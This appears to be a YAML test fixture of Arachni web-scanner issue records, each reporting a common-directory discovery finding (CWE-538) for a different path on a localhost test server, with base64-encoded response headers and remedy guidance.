mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/cmd/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/cmd/ injected: cmd id: cmd elem: path remarks: {} method: '' response: cmd headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/INSTALL_admin/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/INSTALL_admin/ injected: INSTALL_admin id: INSTALL_admin elem: path remarks: {} method: '' response: INSTALL_admin headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTM= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/incomming/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/incomming/ injected: incomming id: incomming elem: path remarks: {} method: '' response: incomming headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/upload/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/upload/ injected: upload id: upload elem: path remarks: :stuff: - Blah - Blah2 method: '' response: upload headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/backend/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/backend/ injected: backend id: backend elem: path remarks: {} method: '' response: backend headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/webmail/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/webmail/ injected: webmail id: webmail elem: path remarks: {} method: '' response: webmail headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/WebService/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/WebService/ injected: WebService id: WebService elem: path remarks: :stuff: - Blah - Blah2 method: '' response: WebService headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTA= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/aspnet/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/aspnet/ injected: aspnet id: aspnet elem: path remarks: {} method: '' response: aspnet headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/Exchange/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/Exchange/ injected: Exchange id: Exchange elem: path remarks: {} method: '' response: Exchange headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/usage/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/usage/ injected: usage id: usage elem: path remarks: {} method: '' response: usage headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/WebApplication1/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/WebApplication1/ injected: WebApplication1 id: WebApplication1 elem: path remarks: {} method: '' response: WebApplication1 headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTU= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/WebApplication2/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/WebApplication2/ injected: WebApplication2 id: WebApplication2 elem: path remarks: {} method: '' response: WebApplication2 headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTU= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/restricted/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/restricted/ injected: restricted id: restricted elem: path remarks: {} method: '' response: restricted headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTA= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/WebApplication3/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/WebApplication3/ injected: WebApplication3 id: WebApplication3 elem: path remarks: {} method: '' response: WebApplication3 headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTU= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/blog/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/blog/ injected: blog id: blog elem: path remarks: {} method: '' response: blog headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/sign/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/sign/ injected: sign id: sign elem: path remarks: {} method: '' response: sign headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the 